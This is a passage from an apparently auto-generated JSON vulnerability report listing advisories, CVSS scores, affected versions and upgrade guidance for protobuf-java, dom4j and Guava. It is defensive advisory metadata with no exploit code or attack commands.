## Severity [CVE-2022-3171](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3171) Medium - CVSS Score: 5.7 (NOTE: there may be a delay in publication) ## Remediation and Mitigation Please update to the latest available versions of the following packages: protobuf-java (3.21.7, 3.20.3, 3.19.6, 3.16.3) protobuf-javalite (3.21.7, 3.20.3, 3.19.6, 3.16.3) protobuf-kotlin (3.21.7, 3.20.3, 3.19.6, 3.16.3) protobuf-kotlin-lite (3.21.7, 3.20.3, 3.19.6, 3.16.3) google-protobuf [JRuby gem only] (3.21.7, 3.20.3, 3.19.6)"}],"product_status":{"known_affected":["com.google.protobuf/protobuf-java@vers:maven/>=2.0.1|<=3.9.2"]},"references":[{"summary":"GitHub Advisory GHSA-h4h5-3hr4-j3g2","url":"https://github.com/protocolbuffers/protobuf/security/advisories/GHSA-h4h5-3hr4-j3g2"},{"summary":"CVE Record","url":"https://github.com/rubysec/ruby-advisory-db/blob/master/gems/google-protobuf/CVE-2022-3171.yml"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CBAUKJQL6O4TIWYBENORSY5P43TVB4M3"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MPCGUT3T5L6C3IDWUPSUO22QDCGQKTOP"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-3171"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-3171"},{"summary":"Gentoo Advisory 
glsa-202301-09","url":"https://security.gentoo.org/glsa/202301-09"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"ADJACENT_NETWORK","availabilityImpact":"HIGH","baseScore":5.7,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":5.7,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"ADJACENT_NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":5.7,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["com.google.protobuf/protobuf-java@vers:maven/>=2.0.1|<=3.9.2"]}],"title":"CVE-2022-3171/pkg:maven/com.google.protobuf/protobuf-java@2.6.0?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-22569"]}],"cve":"CVE-2021-22569","cwe":{"id":"696","name":"Incorrect Behavior Order"},"discovery_date":"2022-01-07T22:31:44","ids":[{"system_name":"CVE Record","text":"CVE-2021-22569"},{"system_name":"GitHub Advisory","text":"GHSA-wrvw-hg22-4m67"},{"system_name":"Google Advisory","text":"bulletins"},{"system_name":"Oracle Advisory","text":"cpuapr2022"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"A potential Denial of Service issue in protobuf-java"},{"category":"details","details":"Vulnerability Details","text":"# A potential Denial of Service issue in protobuf-java ## Summary A potential Denial of Service issue in protobuf-java was discovered in the parsing procedure for binary data. Reporter: [OSS-Fuzz](https://github.com/google/oss-fuzz) Affected versions: All versions of Java Protobufs (including Kotlin and JRuby) prior to the versions listed below. 
Protobuf \"javalite\" users (typically Android) are not affected. ## Severity [CVE-2021-22569](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22569) **High** - CVSS Score: 7.5, An implementation weakness in how unknown fields are parsed in Java. A small (~800 KB) malicious payload can occupy the parser for several minutes by creating large numbers of short-lived objects that cause frequent, repeated GC pauses. ## Proof of Concept For reproduction details, please refer to the oss-fuzz issue that identifies the specific inputs that exercise this parsing weakness. ## Remediation and Mitigation Please update to the latest available versions of the following packages: - protobuf-java (3.16.1, 3.18.2, 3.19.2) - protobuf-kotlin (3.18.2, 3.19.2) - google-protobuf [JRuby gem only] (3.19.2)"}],"product_status":{"known_affected":["com.google.protobuf/protobuf-java@vers:maven/>=2.0.1|<=3.9.2"]},"references":[{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2022/01/12/4"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2022/01/12/7"},{"summary":"Google Advisory bulletins","url":"https://cloud.google.com/support/bulletins#gcp-2022-001"},{"summary":"GitHub Advisory GHSA-wrvw-hg22-4m67","url":"https://github.com/protocolbuffers/protobuf/security/advisories/GHSA-wrvw-hg22-4m67"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-22569"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-22569"},{"summary":"Oracle Advisory 
cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["com.google.protobuf/protobuf-java@vers:maven/>=2.0.1|<=3.9.2"]}],"title":"CVE-2021-22569/pkg:maven/com.google.protobuf/protobuf-java@2.6.0?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-10683"]}],"cve":"CVE-2020-10683","cwe":{"id":"611","name":"Improper Restriction of XML External Entity Reference"},"discovery_date":"2020-06-05T16:13:36","ids":[{"system_name":"CVE Record","text":"CVE-2020-10683"},{"system_name":"Owasp Advisory","text":"XML_External_Entity_Prevention_Cheat_Sheet"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2020"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20200518-0002"},{"system_name":"Red Hat Bugzilla","text":"redhat-bugzilla-1694235"}],"notes":[{"category":"description","details":"Vulnerability 
Description","text":"dom4j allows External Entities by default which might enable XXE attacks"},{"category":"details","details":"Vulnerability Details","text":"# dom4j allows External Entities by default which might enable XXE attacks dom4j before 2.1.3 allows external DTDs and External Entities by default, which might enable XXE attacks. However, there is popular external documentation from OWASP showing how to enable the safe, non-default behavior in any application that uses dom4j. Note: This advisory applies to `dom4j:dom4j` version 1.x legacy artifacts. To resolve this a change to the latest version of `org.dom4j:dom4j` is recommended."}],"product_status":{"known_affected":["org.dom4j/dom4j@vers:maven/>=2.1.0|<2.1.3"],"known_not_affected":["org.dom4j/dom4j@2.1.3"]},"references":[{"summary":"Open Suse Mailing List","url":"http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00061.html"},{"summary":"Red Hat Bugzilla","url":"https://bugzilla.redhat.com/show_bug.cgi?id=1694235"},{"summary":"Owasp Advisory XML_External_Entity_Prevention_Cheat_Sheet","url":"https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r51f3f9801058e47153c0ad9bc6209d57a592fc0e7aefd787760911b8@%3Cdev.velocity.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r91c64cd51e68e97d524395474eaa25362d564572276b9917fcbf5c32@%3Cdev.velocity.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb1b990d7920ae0d50da5109b73b92bab736d46c9788dd4b135cb1a51@%3Cnotifications.freemarker.apache.org%3E"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-10683"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-10683"},{"summary":"NetApp Advisory ntap-20200518-0002","url":"https://security.netapp.com/advisory/ntap-20200518-0002"},{"summary":"Oracle Advisory 
cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2020","url":"https://www.oracle.com/security-alerts/cpujul2020.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["org.dom4j/dom4j@vers:maven/>=2.1.0|<2.1.3"]}],"title":"CVE-2020-10683/pkg:maven/org.dom4j/dom4j@2.1.0?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-8908"]}],"cve":"CVE-2020-8908","cwe":{"id":"173","name":"Improper Handling of Alternate Encoding"},"discovery_date":"2021-03-25T17:04:19","ids":[{"system_name":"CVE Record","text":"CVE-2020-8908"},{"system_name":"Snyk 
Advisory","text":"SNYK-JAVA-COMGOOGLEGUAVA-1015415"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20220210-0003"}],"notes":[{"audience":"developers","category":"other","text":"Exposure of Sensitive Information to an Unauthorized Actor","title":"Additional CWE: 200"},{"audience":"developers","category":"other","text":"Creation of Temporary File With Insecure Permissions","title":"Additional CWE: 378"},{"audience":"developers","category":"other","text":"Incorrect Permission Assignment for Critical Resource","title":"Additional CWE: 732"},{"category":"description","details":"Vulnerability Description","text":"Information Disclosure in Guava"},{"category":"details","details":"Vulnerability Details","text":"# Information Disclosure in Guava A temp directory creation vulnerability exists in Guava prior to version 32.0.0 allowing an attacker with access to the machine to potentially access data in a temporary directory created by the Guava `com.google.common.io.Files.createTempDir()`. The permissions granted to the directory created default to the standard unix-like /tmp ones, leaving the files open. Maintainers recommend explicitly changing the permissions after the creation of the directory, or removing uses of the vulnerable method. 
## Related CVE(s) CVE-2020-8908, SNYK-JAVA-COMGOOGLEGUAVA-1015415"}],"product_status":{"known_affected":["com.google.guava/guava@vers:maven/>=0.0.0|<32.0.0-android"],"known_not_affected":["com.google.guava/guava@32.0.0-android"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r007add131977f4f576c232b25e024249a3d16f66aad14a4b52819d21%40%3Ccommon-issues.hadoop.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r007add131977f4f576c232b25e024249a3d16f66aad14a4b52819d21@%3Ccommon-issues.hadoop.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r037fed1d0ebde50c9caf8d99815db3093c344c3f651c5a49a09824ce@%3Cdev.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r07ed3e4417ad043a27bee7bb33322e9bfc7d7e6d1719b8e3dfd95c14%40%3Cdev.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r07ed3e4417ad043a27bee7bb33322e9bfc7d7e6d1719b8e3dfd95c14@%3Cdev.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r161b87f8037bbaff400194a63cd2016c9a69f5949f06dcc79beeab54%40%3Cdev.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r161b87f8037bbaff400194a63cd2016c9a69f5949f06dcc79beeab54@%3Cdev.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r215b3d50f56faeb2f9383505f3e62faa9f549bb23e8a9848b78a968e%40%3Ccommits.ws.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r215b3d50f56faeb2f9383505f3e62faa9f549bb23e8a9848b78a968e@%3Ccommits.ws.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r294be9d31c0312d2c0837087204b5d4bf49d0552890e6eec716fa6a6%40%3Cyarn-issues.hadoop.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/r294be9d31c0312d2c0837087204b5d4bf49d0552890e6eec716fa6a6@%3Cyarn-issues.hadoop.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2fe45d96eea8434b91592ca08109118f6308d60f6d0e21d52438cfb4%40%3Cdev.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2fe45d96eea8434b91592ca08109118f6308d60f6d0e21d52438cfb4@%3Cdev.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r3c3b33ee5bef0c67391d27a97cbfd89d44f328cf072b601b58d4e748%40%3Ccommits.pulsar.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r3c3b33ee5bef0c67391d27a97cbfd89d44f328cf072b601b58d4e748@%3Ccommits.pulsar.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r3dd8881de891598d622227e9840dd7c2ef1d08abbb49e9690c7ae1bc%40%3Cissues.geode.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r3dd8881de891598d622227e9840dd7c2ef1d08abbb49e9690c7ae1bc@%3Cissues.geode.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r4776f62dfae4a0006658542f43034a7fc199350e35a66d4e18164ee6%40%3Ccommits.cxf.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r4776f62dfae4a0006658542f43034a7fc199350e35a66d4e18164ee6@%3Ccommits.cxf.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r49549a8322f62cd3acfa4490d25bfba0be04f3f9ff4d14fe36199d27%40%3Cyarn-dev.hadoop.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r49549a8322f62cd3acfa4490d25bfba0be04f3f9ff4d14fe36199d27@%3Cyarn-dev.hadoop.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/r58a8775205ab1839dba43054b09a9ab3b25b423a4170b2413c4067ac%40%3Ccommon-issues.hadoop.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r58a8775205ab1839dba43054b09a9ab3b25b423a4170b2413c4067ac@%3Ccommon-issues.hadoop.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5b3d93dfdfb7708e796e8762ab40edbde8ff8add48aba53e5ea26f44%40%3Cissues.geode.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5b3d93dfdfb7708e796e8762ab40edbde8ff8add48aba53e5ea26f44@%3Cissues.geode.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5d61b98ceb7bba939a651de5900dbd67be3817db6bfcc41c6e04e199%40%3Cyarn-issues.hadoop.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5d61b98ceb7bba939a651de5900dbd67be3817db6bfcc41c6e04e199@%3Cyarn-issues.hadoop.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r6874dfe26eefc41b7c9a5e4a0487846fc4accf8c78ff948b24a1104a%40%3Cdev.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r6874dfe26eefc41b7c9a5e4a0487846fc4accf8c78ff948b24a1104a@%3Cdev.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r68d86f4b06c808204f62bcb254fcb5b0432528ee8d37a07ef4bc8222%40%3Ccommits.ws.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r68d86f4b06c808204f62bcb254fcb5b0432528ee8d37a07ef4bc8222@%3Ccommits.ws.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r79e47ed555bdb1180e528420a7a2bb898541367a29a3bc6bbf0baf2c%40%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/r79e47ed555bdb1180e528420a7a2bb898541367a29a3bc6bbf0baf2c@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7b0e81d8367264d6cad98766a469d64d11248eb654417809bfdacf09%40%3Cyarn-issues.hadoop.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7b0e81d8367264d6cad98766a469d64d11248eb654417809bfdacf09@%3Cyarn-issues.hadoop.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r841c5e14e1b55281523ebcde661ece00b38a0569e00ef5e12bd5f6ba%40%3Cissues.maven.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r841c5e14e1b55281523ebcde661ece00b38a0569e00ef5e12bd5f6ba@%3Cissues.maven.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra7ab308481ee729f998691e8e3e02e93b1dedfc98f6b1cd3d86923b3%40%3Cyarn-issues.hadoop.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra7ab308481ee729f998691e8e3e02e93b1dedfc98f6b1cd3d86923b3@%3Cyarn-issues.hadoop.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb2364f4cf4d274eab5a7ecfaf64bf575cedf8b0173551997c749d322%40%3Cgitbox.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb2364f4cf4d274eab5a7ecfaf64bf575cedf8b0173551997c749d322@%3Cgitbox.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb8c0f1b7589864396690fe42a91a71dea9412e86eec66dc85bbacaaf%40%3Ccommits.cxf.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb8c0f1b7589864396690fe42a91a71dea9412e86eec66dc85bbacaaf@%3Ccommits.cxf.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/rbc7642b9800249553f13457e46b813bea1aec99d2bc9106510e00ff3%40%3Ctorque-dev.db.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rbc7642b9800249553f13457e46b813bea1aec99d2bc9106510e00ff3@%3Ctorque-dev.db.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc2dbc4633a6eea1fcbce6831876cfa17b73759a98c65326d1896cb1a%40%3Ctorque-dev.db.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc2dbc4633a6eea1fcbce6831876cfa17b73759a98c65326d1896cb1a@%3Ctorque-dev.db.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc607bc52f3507b8b9c28c6a747c3122f51ac24afe80af2a670785b97%40%3Cissues.geode.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc607bc52f3507b8b9c28c6a747c3122f51ac24afe80af2a670785b97@%3Cissues.geode.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rcafc3a637d82bdc9a24036b2ddcad1e519dd0e6f848fcc3d606fd78f%40%3Cdev.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rcafc3a637d82bdc9a24036b2ddcad1e519dd0e6f848fcc3d606fd78f@%3Cdev.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd01f5ff0164c468ec7abc96ff7646cea3cce6378da2e4aa29c6bcb95%40%3Cgithub.arrow.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd01f5ff0164c468ec7abc96ff7646cea3cce6378da2e4aa29c6bcb95@%3Cgithub.arrow.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd2704306ec729ccac726e50339b8a8f079515cc29ccb77713b16e7c5%40%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/rd2704306ec729ccac726e50339b8a8f079515cc29ccb77713b16e7c5@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd5d58088812cf8e677d99b07f73c654014c524c94e7fedbdee047604%40%3Ctorque-dev.db.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd5d58088812cf8e677d99b07f73c654014c524c94e7fedbdee047604@%3Ctorque-dev.db.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd7e12d56d49d73e2b8549694974b07561b79b05455f7f781954231bf%40%3Cdev.pig.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd7e12d56d49d73e2b8549694974b07561b79b05455f7f781954231bf@%3Cdev.pig.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/re120f6b3d2f8222121080342c5801fdafca2f5188ceeb3b49c8a1d27%40%3Cyarn-issues.hadoop.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/re120f6b3d2f8222121080342c5801fdafca2f5188ceeb3b49c8a1d27@%3Cyarn-issues.hadoop.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/reebbd63c25bc1a946caa419cec2be78079f8449d1af48e52d47c9e85%40%3Cissues.geode.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/reebbd63c25bc1a946caa419cec2be78079f8449d1af48e52d47c9e85@%3Cissues.geode.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf00b688ffa620c990597f829ff85fdbba8bf73ee7bfb34783e1f0d4e%40%3Cyarn-dev.hadoop.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf00b688ffa620c990597f829ff85fdbba8bf73ee7bfb34783e1f0d4e@%3Cyarn-dev.hadoop.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/rf9f0fa84b8ae1a285f0210bafec6de2a9eba083007d04640b82aa625%40%3Cissues.geode.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf9f0fa84b8ae1a285f0210bafec6de2a9eba083007d04640b82aa625@%3Cissues.geode.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rfc27e2727a20a574f39273e0432aa97486a332f9b3068f6ac1346594%40%3Cdev.myfaces.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rfc27e2727a20a574f39273e0432aa97486a332f9b3068f6ac1346594@%3Cdev.myfaces.apache.org%3E"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-8908"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-8908"},{"summary":"NetApp Advisory ntap-20220210-0003","url":"https://security.netapp.com/advisory/ntap-20220210-0003"},{"summary":"Snyk Advisory SNYK-JAVA-COMGOOGLEGUAVA-1015415","url":"https://snyk.io/vuln/SNYK-JAVA-COMGOOGLEGUAVA-1015415"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory 
cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"LOCAL","availabilityImpact":"NONE","baseScore":3.3,"baseSeverity":"LOW","confidentialityImpact":"LOW","environmentalScore":3.3,"environmentalSeverity":"LOW","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"LOCAL","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"LOW","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":3.3,"temporalSeverity":"LOW","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N","version":"3.1"},"products":["com.google.guava/guava@vers:maven/>=0.0.0|<32.0.0-android"]}],"title":"CVE-2020-8908/pkg:maven/com.google.guava/guava@23.0?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-2976"]}],"cve":"CVE-2023-2976","cwe":{"id":"379","name":"Creation of Temporary File in Directory with Insecure Permissions"},"discovery_date":"2023-06-14T18:30:38","ids":[{"system_name":"CVE Record","text":"CVE-2023-2976"},{"system_name":"Intel Advisory","text":"intel-sa-01006"},{"system_name":"NetApp Advisory","text":"ntap-20230818-0008"}],"notes":[{"audience":"developers","category":"other","text":"Files or Directories Accessible to External Parties","title":"Additional CWE: 552"},{"category":"description","details":"Vulnerability Description","text":"Guava vulnerable to insecure use of temporary directory"},{"category":"details","details":"Vulnerability Details","text":"# Guava vulnerable to insecure use of temporary directory Use of Java's default temporary directory for file creation in `FileBackedOutputStream` in Google Guava versions 1.0 to 31.1 on Unix systems and Android Ice Cream Sandwich allows other users and apps on the machine with access to the 
default Java temporary directory to be able to access the files created by the class. Even though the security vulnerability is fixed in version 32.0.0, maintainers recommend using version 32.0.1 as version 32.0.0 breaks some functionality under Windows."}],"product_status":{"known_affected":["com.google.guava/guava@vers:maven/>=1.0|<32.0.0-android"],"known_not_affected":["com.google.guava/guava@32.0.0-android"]},"references":[{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-2976"},{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-2976"},{"summary":"NetApp Advisory ntap-20230818-0008","url":"https://security.netapp.com/advisory/ntap-20230818-0008"},{"summary":"Intel Advisory intel-sa-01006","url":"https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01006.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"LOCAL","availabilityImpact":"NONE","baseScore":5.5,"baseSeverity":"MEDIUM","confidentialityImpact":"HIGH","environmentalScore":5.5,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"LOCAL","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":5.5,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N","version":"3.1"},"products":["com.google.guava/guava@vers:maven/>=1.0|<32.0.0-android"]}],"title":"CVE-2023-2976/pkg:maven/com.google.guava/guava@23.0?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-13956"]}],"cve":"CVE